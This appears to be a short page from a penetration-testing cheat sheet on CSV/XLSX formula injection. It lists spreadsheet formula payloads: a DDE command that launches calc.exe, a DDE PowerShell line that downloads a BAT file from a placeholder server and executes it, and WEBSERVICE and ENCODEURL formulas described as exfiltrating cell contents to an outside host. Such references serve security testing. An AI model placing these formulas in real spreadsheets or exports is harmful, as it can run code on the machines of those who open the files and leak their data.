search
ITPTToolsGithub

CSV/XLSX formula injection

Formula

Description

=cmd|' /C calc'!xxx

Launch calc.exe

=HYPERLINK("https://www.google.com/","here")

Link to https://www.google.com/

=cmd|’/C powershell iex(wget "<server/m.bat>" -OutFile "C:/m.bat"); "C:/m.bat"’!A0

Download a BAT file and execute it

=WEBSERVICE("https://example.com/?data="&A1)

Data exfiltration of spreadsheet content

=ENCODEURL(A1)

Data exfiltration of spreadsheet content

PreviousCommon Frameworks and librariesNextPlatforms

Last updated